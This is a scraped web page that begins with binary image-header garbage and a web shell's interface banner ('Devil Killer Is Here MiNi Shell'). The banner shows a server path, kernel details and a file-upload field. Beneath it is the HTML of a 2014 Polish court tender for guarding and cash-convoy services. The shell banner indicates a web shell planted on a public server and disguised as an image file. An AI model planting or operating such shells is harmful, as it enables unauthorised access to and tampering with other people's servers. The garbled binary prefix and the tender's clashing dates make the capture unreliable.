JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141213/258055-N-2014.html

<p class="kh_header"><b>Jelenia Góra: Bezpośrednia ochrona fizyczna osób i mienia w obiektach 
Sądu Rejonowego w Jeleniej Górze oraz transportowanie wartości pieniężnych i innych przedmiotów wartościowych w formie konwoju.</b><br>
<b>Numer ogłoszenia: 258055 - 2014; data zamieszczenia: 13.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Jeleniej Górze , ul. Bankowa 18, 58-500 Jelenia Góra, woj. dolnośląskie, tel. 075 6471745, faks 075 6471745.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.jelenia-gora.so.gov.pl/index.php?id_jednostki=7</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezpośrednia ochrona fizyczna osób i mienia w obiektach 
Sądu Rejonowego w Jeleniej Górze oraz transportowanie wartości pieniężnych i innych przedmiotów wartościowych w formie konwoju..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usługi w zakresie bezpośredniej ochrony fizycznej osób, mienia i obiektów należących do Zamawiającego. Czynności powyższe obejmują ochronę fizyczną połączoną z obsługą systemu telewizji dozorowej monitorującej budynki i posesje sądu, systemów antywłamaniowych, przeciwpożarowych w tym obsługa mobilnego skanera rentgenowskiego i bramkowego wykrywacza metali oraz obsługę przewozu i konwojowania wartości pieniężnych  Sądu Rejonowego w Jeleniej Górze.
2.  Nazwa i kod zamówienia według Wspólnego Słownika Zamówień: usługi ochroniarskie - 79710000-4 - usługi ochroniarskie, 797110001- usługi nadzoru przy użyciu alarmu.
 3. Zakresem zamówienia objęty jest :
A. Obiekt (nieruchomość) położony przy ul. Bankowej 18 w Jeleniej Górze (centrum miasta)o powierzchni 1.499,50 m2 z jedną kondygnacją podziemną, 2 kondygnacjami naziemnymi i użytkowym poddaszem. W budynku znajdują się 2 klatki schodowe (główne wejście od ulicy Bankowej 18 i awaryjne od ul. Szkolnej). Budynek jest wyposażony w: - system monitoringu wyposażony w kamery zainstalowane w newralgicznych punktach, - system sygnalizacji alarmowej włamania i napadu, - system powiadamiania o zagrożeniu pożarowym, składający się z czujników dymu i czujników ruchu rozmieszczonych w poszczególnych pomieszczeniach i ciągach komunikacyjnych.  B.  Obiekt (nieruchomość)  położony przy ul. Mickiewicza 21 w Jeleniej Górze o powierzchni 5.321,20 m2 o konstrukcji żelbetowej  okładziną   szklaną oraz w technologii tradycyjnej, o trzech kondygnacjach naziemnych, jednej podziemnej z parkingiem (22 stanowiska) oraz 
pomieszczeniami dla zatrzymanych. W budynku znajdują się 3 klatki schodowe i winda. Teren wokół  budynku jest ogrodzony i wyposażony w  bramę   wzjadową  od ul. Norwida 9  (w tym wejście i wjazd dla osób niepełnosprawnych) oraz wejściową od ul. Mickiewicza  21  -  automatycznie otwierane. Budynek jest wyposażony w - system monitoringu wyposażony w kamery zainstalowane w newralgicznych punktach, - system sygnalizacji alarmowej włamania i napadu, - system powiadamiania o zagrożeniu pożarowym, składający się z czujników dymu i czujników ruchu rozmieszczonych w poszczególnych pomieszczeniach i ciągach komunikacyjnych. - system kontroli dostępu.
1. Ochrona pożarowa: obiekty wyszczególnione w pkt. 3 są wyposażone zgodnie z wytycznymi Ministra Infrastruktury dotyczącymi wymogów bezpieczeństwa pożarowego, określonymi w rozporządzeniu Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (D.U.2002.75.690 ze zm).
2. Ochrona obiektów opisanych w pkt. 3 sprawowana będzie w okresie trwania umowy przez pracowników ochrony przez siedem dni w tygodniu odpowiednio:
1. Ochrona będzie wykonywana a/ dla obiektu przy ul. Bankowej 18 przez
- 1 pracownika na zmianie dziennej w dni robocze w godz. 08:00-16:00;
- 1 pracownika na zmianie nocnej w dni robocze w godz.   16:00 -08:00;
- 1 pracownika w dni wolne od pracy całodobowo;
- pierwszy dyżur rozpoczyna się w dniu 31 stycznia 2015.r. o godzinie 15:00
- ostatni dyżur kończy się w dniu 30 listopada 2014.r. o godzinie 15:00
b) dla obiektu przy ul. Mickiewicza 21 przez:
-4 pracowników na zmianie dziennej w poniedziałki  w godz. 7:15-18:00 
-4 pracowników na zmianie dziennej w dni robocze od wtorku do piątku w godz. 7:15-17:00;
-2 pracowników na zmianie nocnej w poniedziałki   w godz. 18:00-7:15;
-2 pracowników na zmianie nocnej w dni robocze od wtorku do piątku w godz. 17:00-7:15;
- 2 pracowników w dni wolne od pracy całodobowo;
- pierwszy dyżur rozpoczyna się w dniu 31 stycznia 2015.r. o godzinie 15:00;
- ostatni dyżur kończy się w dniu 30 listopada 2014.r. o godzinie 15:00;
3.   Ochrona ma mieć zapewnienie wsparcia pracowników ochrony grupą interwencyjną w rozumieniu  § 1 ust. 3 rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia  21 października 2011r. w sprawie zasad uzbrojenia specjalistycznych zbrojonych formacji ochronnych i warunków przechowywania oraz  ewidencjonowania broni i amunicji (D.U.2011.245.1462).
4. W razie potrzeby Zamawiający może zwrócić się do Wykonawcy o ilościowe zwiększenie obsady pracowników chroniących obiekt, lub zmianę godzin wykonywania usługi na warunkach finansowych określonych w umowie, a Wykonawca uwzględni zgłoszone potrzeby w terminie 3 dni roboczych.
5. Pracownicy ochrony, o których mowa w pkt 3, winni być w czasie służby wyposażeni  w  następujące środki:  system kontroli obchodów, łączność radiową, system napadowy wzywający załogi interwencyjne, środki przymusu bezpośredniego (kajdanki, pałki obronne wielofunkcyjne), środki łączności bezprzewodowej (telefon komórkowy) zapewniający bezpośrednie połączenie z firmą i  Zamawiającym. Numer telefonu komórkowego  Wykonawca przekaże Zamawiającemu przed   rozpoczęciem pierwszego dyżuru. 
6.  Pracownicy ochrony pełniący obowiązki w obiektach Sądu Rejonowego w Jeleniej Górze winni być ubrani jednolicie w czarne lub granatowe spodnie, dopasowana do nich marynarkę, białą koszulę lub mundur formacji. W porze letniej dopuszczalna jest biała koszula z krótkim rękawem. Wszyscy zobowiązani są posiadać identyfikator  umieszczony w widocznym miejscu (identyfikator musi posiadać nazwę lub logo firmy, zdjęcie, imię i nazwisko pracownika ochrony lub jego numer).
7.Wszelkie czynności związane z zapewnieniem wymaganego przez Zamawiającego sposobu realizacji usługi, w tym także zapewnienie wymaganego wyposażenia w czasie wykonywania  usługi ochrony oraz wymaganej dokumentacji, a także przeszkolenia pracowników w zakresie  obsługi wykorzystywanych urządzeń, obciążają Wykonawcę.
8.Wykonawca w terminie 14 dni od daty zawarcia umowy ma obowiązek: 
a)sporządzić (Regulamin i instrukcję ochrony obiektu) i aktualizować ją w zależności od potrzeb na wniosek Zamawiającego,
b)prowadzić Książkę meldunków stałych dyżurów,
c)sporządzać grafiki pełnienia służby ochrony, 
d)sprawować kontrolę i nadzór nad podległymi pracownikami ochrony fizycznej.
9.Wykonawca kierować będzie do ochrony obiektu pracowników ochrony posiadających:
1)legitymację kwalifikowanego pracownika ochrony fizycznej,
2)legitymację niekwalifikowanego pracownika ochrony fizycznej,
10.Wykonawca winien przedstawić Zamawiającemu do akceptacji przed przystąpieniem do realizacji umowy, wykaz pracowników ochrony przewidzianych do realizacji umowy wraz z kserokopiami stosownych dokumentów lub oświadczeniem o spełnieniu wymogów, o których mowa w pkt. 9.
11. Zamawiający zastrzega sobie prawo nie wyrażenia zgody na dopuszczenie do świadczenia usługi wskazanych przez Wykonawcę pracowników ochrony bez podania przyczyn.
12. Zmiana pracowników ochrony wymaga powiadomienia Zamawiającego, z co najmniej 7dniowym wyprzedzeniem. W przypadku konieczności nagłej zmiany pracownika ochrony, Wykonawca powiadomi o tym Zamawiającego telefonicznie oraz dokona  odpowiedniej adnotacji o powyższym w (Książce przebiegu służby) i skieruje do  ochrony obiektu osoby o kwalifikacjach       odpowiednich spełniających wymagania  określone w pkt .9 - wskazując ich personalnie.
13. Wykonawca zobowiązuje się do dokonywania zmian personalnych na wniosek Zamawiającego, po uprzedniej konsultacji z Zamawiającym.
14.W przypadku nie przybycia na służbę pracownika ochrony lub przybycia w stanie uniemożliwiającym wykonywanie obowiązków, Wykonawca ma obowiązek niezwłocznie, jednak nie później niż w dwie godziny licząc od powiadomienia przez Zamawiającego o powyższym, zapewnić do ochrony obiektu innego pracownika Ochrony.
 15. Wykonawca zobowiązuje się do kontrolowania pracowników przynajmniej w sposób zapewniający stały monitoring ich pracy w dzień i w nocy (nie rzadziej niż raz na tydzień ) i dokonywania adnotacji o kontroli w (Książce przebiegu służby).
 16. Wykonawca zobowiązuje się do zapewnienia przyjazdu grupy interwencyjnej (conajmniej 2 osoby w jednej załodze, wliczając kierowcę, które nie posiadają statusu osób niepełnosprawnych, legitymującego się wpisem pracownika kwalifikowanego ochrony  fizycznej, poza kierowcą) wyposażonych w środki przymusu bezpośredniego i broni   palnej (Dz.U.2013.628) w czasie nie dłuższym niż 10 minut przez całą dobę,  licząc od chwili wezwania.
17. Zamawiający upoważniony jest do kontrolowania pracowników ochrony w każdym  czasie oraz sprawdzenia czasu przyjazdu grupy interwencyjnej.
18. Dokumentację przebiegu służby pracowników ochrony oraz korespondencji pomiędzy Zamawiającym a Wykonawcą stanowić będzie w szczególności (Książka przebiegu  służby)
19. W razie zaistnienia nagłych zdarzeń typu pożar, powódź, włamanie, kradzież, napad itp. Wykonawca powiadamia o tym bezzwłocznie, wszelkimi dostępnymi środkami:
1) osoby wskazane przez Zamawiającego - wykaz tych osób, numery telefonów dostarczy Zamawiający; na nim ciąży też obowiązek aktualizacji wykazu oraz zapewnienia pracownikom ochrony swobodnego dostępu do telefonu w celach służbowych;
2) odpowiednie służby:
a) pogotowie ratunkowe,
b) pogotowie gazowe,
c) straż pożarną,
d) pogotowie sieci elektrycznej,
e) pogotowie wodociągowe,
Wykaz telefonów służbowych i alarmowych sporządzi Zamawiający, na nim też będzie spoczywał obowiązek ich aktualizacji.
20. W przypadku wykorzystywania telefonu służbowego niezgodnie z załączonym wykazem koszty dodatkowych połączeń pokryje Wykonawca.
21. Zamawiający będzie utrzymywał w stałej sprawności sieć energetyczną i telefoniczną.O wszelkiej ich niesprawności Wykonawca będzie informował Zamawiającego za pośrednictwem pracowników ochrony i odnotowywał ten fakt w (Książce przebiegu służby)
22. Zamawiający zapewni pracownikom ochrony pomieszczenie socjalne.
23. Wykonawca ponosi pełną odpowiedzialność za wszelkie działania lub zaniechania związane z realizacją umowy oraz za działania lub zaniechania osób skierowanych przez Wykonawcę do realizacji umowy w tym za szkody, które wynikną wskutek niewykonania lub nienależytego wykonania zobowiązań umownych;
II. ZADANIA PRACOWNIKÓW OCHRONY I ZAKRES ICH OBOWIĄZKÓW
Do obowiązków pracowników ochrony należeć będzie w szczególności: 
1.sprawdzanie  otoczenia obiektu sądowego po godzinach urzędowania sądów oraz w dni wolne od pracy oraz święta, nie rzadziej niż co 2 godziny, 
2.zapewnienie kontroli nad infrastrukturą chronionego obiektu oraz zapobieganie próbom kradzieży, dewastacji i uszkodzenia mienia wewnątrz i na zewnątrz chronionego obiektu,
3.sprawdzenia stanu wszelkich zamknięć, zabezpieczeń i plomb;
4.zakaz wpuszczania do budynku sądowego, po godzinach jego urzędowania osób nie będących pracownikami Sądu;
5.legitymowanie osób wchodzących na teren budynku, w celu wykonania prac remontowych, usunięcia awarii, osób do wykonania prac czystościowych i in., i sprawdzanie ich zgodności z listą przedstawioną przez pracownika Zamawiającego, odpowiedzialnego za te czynności;
6.dokumentowanie pobytu na terenie obiektu sądowego pracowników pogotowia energetycznego, ciepłowniczego, wodno-kanalizacyjnego  oraz pracowników  usuwających zgłoszone awarie;
7.kontrolowanie wjazdu pojazdów na teren parkingu  od strony ul. Norwida  i przy ul. Bankowej i ich wyjazdu, za pomocą urządzeń monitorujących - według wykazu osób uprawnionych do parkowania samochodów;
8.otwieranie bram wejściowych na posesję Sądu przed rozpoczęciem pracy i zamykanie po jej zakończeniu w dni urzędowania sądów, co najmniej na pół godziny przed rozpoczęciem pracy, otwieranie drzwi wejściowych od ul. Bankowej oraz drzwi od ul. Mickiewicza. 
9.wydawanie i przyjmowanie kluczy od pomieszczeń sądowych, wg posiadanego wykazu osób uprawnionych do ich pobrania, za pokwitowaniem w (Książce wydawanych kluczy); 
10.nadzorowanie  sprawności sygnalizacji alarmowych - antywłamaniowej i p.poż, oraz obsługa urządzeń systemów kontrolnych i zabezpieczających (mobilny skaner rentgenowski i bramkowy wykrywacz metali,  system monitoringu wizyjnego  itp.) a w przypadku awarii, niezwłoczne zawiadomienie zgodnie z instrukcją;
11.ustalania uprawnień osób do przebywania w obiekcie oraz legitymowania osób w celu ustalenia ich tożsamości,
12.wzywania osób do opuszczania obiektu w przypadku stwierdzenia braku uprawnień do przebywania na terenie chronionego obiektu albo stwierdzenia zakłócania porządku; 
13.prowadzenie ewidencji pracowników, którzy za zgodą przełożonych przebywają na terenie sądów po godzinach urzędowania;
14.w razie stwierdzenia zagrożeń zaistniałych na terenie obiektu sądowego niezwłoczne powiadomienie dyżurnego agencji ochrony i wyznaczonego przedstawiciela Zamawiającego a w zależności od zagrożenia, służby publiczne takie jak: policja, straż pożarna, pogotowie ratunkowe, energetyczne itp., a następnie postępowanie zgodnie z instrukcjami ppoż. i wykonywania ochrony w obiektach sądowych;
15.w przypadku zagrożenia korzystanie z natychmiastowego, od przekazania sygnału alarmowego, wsparcia grupy interwencyjnej;
16.wykonywanie innych doraźnie niezbędnych czynności związanych z zapewnieniem bezpieczeństwa osób i mienia oraz ochrony informacji niejawnych w obiekcie sądowym;
17.dokumentowanie przebiegu dyżuru w książce meldunków/zdarzeń, na zakończenie dyżuru oraz przekazywanie zmiennikowi istotnych informacji dotyczących ochrony obiektu sądowego lub osobom odpowiedzialnym w Sądzie za zapewnienie ochrony, bezpieczeństwa  i porządku wewnętrznego. Po przyjęciu/zdaniu służby wspólnie ze zmiennikiem podpisanie zdania i przyjęcia dyżuru w obiekcie sądowym;
18.postępowanie zgodne z instrukcją alarmową p.poż. i bhp oraz zasadami postępowania w wypadku zagrożenia bezpieczeństwa życia ludzi;
19.wymiany wkładki zamka oraz dorobienia klucza na własny koszt w przypadku zagubienia klucza do pomieszczenia; 
20.monitorowanie przepływu osób przez chroniony obiekt, 
21.niedopuszczenie do wnoszenia na teren ochranianego obiektu materiałów niebezpiecznych, materiałów i towarów przeznaczonych do sprzedaży lub rozpowszechniania, 
22.sprawdzeniu bagażu osób wchodzących do sądu z przedmiotami lub dużymi pakunkami,w których mogą znajdować się materiały niebezpieczne bądź ładunki wybuchowe. W przypadku, gdy osoby, o których mowa wyżej odmówią okazania zawartości posiadanych pakunków, należy nakazać tym osobom opuszczenia budynku sądu. W przypadku, kiedy osoby te nie dostosują się do poleceń pracowników ochrony, po ich ujęciu należy niezwłocznie przekazać policji,
23.sprawowanie kontroli nad legalnością wynoszenia z budynku sprzętu elektronicznego, informatycznego i innych składników majątku sądu,
24.pełna znajomość topografii chronionego obiektu - rozkładu pomieszczeń, dróg ewakuacyjnych itp., 
25.znajomość rozmieszczenia i umiejętność obsługi głównych wyłączników prądu, instalacji ppoż., zaworów wodnych i gazowych,
26.udostępnianie pomieszczeń sądu w dni wolne od pracy na podstawie zasad określonych w wewnętrznymi przepisami Zamawiającego, 
27.zapalanie i gaszenie świateł nocnych zewnętrznych i wewnątrz obiektu zgodnie z zaleceniami Zamawiającego,
28.zapoznania pracowników wykonujących przedmiot zamówienia z instrukcją p.poż., regulaminem pracy Zamawiającego (oraz innymi aktami w razie ich powołania) oraz zobowiązanie pracowników ochrony do stosowania tych aktów przy wykonywaniu przedmiotu zamówienia; 
29.wykonywania innych czynności uzgodnionych przez strony umowy, które będą stanowiły pisemny aneks do zawartej umowy. 
III.  TRANSPORTOWANIE WARTOŚCI PIENIĘŻNYCH I INNYCH  
PRZEDMIOTÓW WARTOŚCIOWYCH W FORMIE KONWOJU
Zamawiający powierza a Wykonawca przyjmuje do wykonania usługę obejmującą: transport na żądanie własnym środkiem transportu,  pracownika Zamawiającego przewożącego wartości pieniężne i inne przedmioty wartościowe z siedziby Zamawiającego   do Oddziałów Banku:
- PKO BP SA w Jeleniej Górze przy ul. Różyckiego 6  i z  powrotem 
- Banku Zachodniego WBK w  Jeleniej Górze przy Pl. Niepodległości 4 i z powrotem a w przypadku zmiany banku do jego siedziby.
Usługi objęte przedmiotem zamówienia powinny być świadczone zgodnie z wymaganiami określonymi ustawą z dnia 22 sierpnia 1997r. o ochronie osób i  mienia (t.j. D.U.2014.1099) oraz rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 7 września 2010r. w sprawie wymagań, jakim powinna odpowiadać ochrona wartości pieniężnych przechowywanych i transportowanych przez przedsiębiorców i inne jednostki organizacyjne (D.U.166.1128 ze zm.)
Przewidywana ilość konwojów w trakcie obowiązywania umowy: 5 miesięcznie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 31.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełniony warunek, gdy Wykonawca posiada aktualną koncesję na prowadzenie działalności gospodarczej objętej zamówieniem wydaną przez MSWiA, o której mowa w ustawie z dnia 22 sierpnia 1997 r. o ochronie osób i mienia ( D.U.2005.145.1221 z zm.)
Brak aktualnej koncesji zostanie oceniony jako niespełnienie warunku, a Wykonawca podlegać będzie wykluczeniu. 
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń według kryterium - spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełniony warunek, gdy Wykonawca wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonał, w okresie ostatnich 3 lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie usługi ochrony osób i mienia w minimum 3 obiektach użyteczności publicznej wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. 
Zamawiający informuje, że przy ocenie  tego warunku będzie uwzględniał tylko takie usługi, z   których każda spełnia następujące warunki:
a) świadczenie usług na podstawie umowy przez okres minimum 12 miesięcy,
b) usługi realizowane w obiektach użyteczności publicznej o powierzchni co najmniej 5000m2.
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń według kryterium - spełnia/nie spełnia.      
2)Posiadają certyfikat PN EN ISO 9001:2009 z tytułu wdrożenia i stosowania zarządzania jakością  w zakresie usług ochrony osób i mienia.
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń według kryterium - spełnia/nie spełnia. Brak certyfikatu  zostanie oceniony jako niespełnienie warunku, a Wykonawca podlegać  będzie wykluczeniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełniony warunek, gdy Wykonawca dysponuje :
a) minimum 6  osobami nie karalnymi w tym:
-  do pełnienia służby w dyżurze dziennym  w poniedziałek w godzinach 7:15-18:00, w pozostałe dni robocze w godzinach 7:15-17:00- minimum 6 osób wpisanych na listę kwalifikowanych  pracowników ochrony fizycznej i wykonujących zadania ochrony na rzecz przedsiębiorcy, który uzyskał koncesję na prowadzenie działalności gospodarczej  w   zakresie usług ochrony osób i mienia, o których mowa w ustawie z dnia 22 sierpnia 1997r.   o ochronie osób i mienia (D.U. 2005.145.1221ze zm.); 
-  do pełnienia służby w  poniedziałek w godzinach 18:00- 7:15, w pozostałe dni robocze w godzinach 17:00 - 7:15, w dni wolne od pracy i święta całodobowo  minimum 4 osoby - ochrona osób i mienia może być wykonywana przez  osoby w stosunku, do których nie jest wymagany  wpis, o którym mowa powyższe;
b)     grupą interwencyjną  w liczbie dwóch osób nie karanych, posiadających:
-  zaświadczenie o wpisie na listę kwalifikowanych pracowników ochrony fizycznej  i wykonujących zadania ochrony na rzecz przedsiębiorcy, który uzyskał koncesję  na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia.        
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu na podstawie :
1. wykazu osób, które będą uczestniczyć w wykonaniu zamówienia. 
2. wykazania, że Wykonawca posiada aktualną decyzję nadającą status SUFO i oświadczenia, że dysponuje grupą interwencyjną wchodzącą w skład SUFO (dysponuje co najmniej jednym  oznakowanym pojazdem zapewniającym przyjazd grupy interwencyjnej do ochranianego obiektu w ciągu 10 minut od momentu wezwania przez pracowników ochrony lub upoważnionych pracowników Zamawiającego). Warunek zostanie uznany za spełniony poprzez złożenie odpowiedniej decyzji i oświadczenia. W wykazie należy zamieścić informacje na temat kwalifikacji zawodowych tych osób, ich  doświadczenia, zakresu wykonywanych przez nich czynności, oraz informację o podstawie do  dysponowania tymi osobami (rodzaj umowy). Niemożność wykazania się Wykonawcy dysponowaniem osób do wykonania zamówienia zgodnie z opisanym kryterium spowoduje wykluczenie Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełniony warunek, gdy Wykonawca dysponuje :
a) minimum 6  osobami nie karalnymi w tym:
-  do pełnienia służby w dyżurze dziennym  w poniedziałek w godzinach 7:15-18:00, w pozostałe dni robocze w godzinach 7:15-17:00- minimum 6 osób wpisanych na listę kwalifikowanych  pracowników ochrony fizycznej i wykonujących zadania ochrony na rzecz przedsiębiorcy, który uzyskał koncesję na prowadzenie działalności gospodarczej  w   zakresie usług ochrony osób i mienia, o których mowa w ustawie z dnia 22 sierpnia 1997r.   o ochronie osób i mienia (D.U. 2005.145.1221ze zm.); 
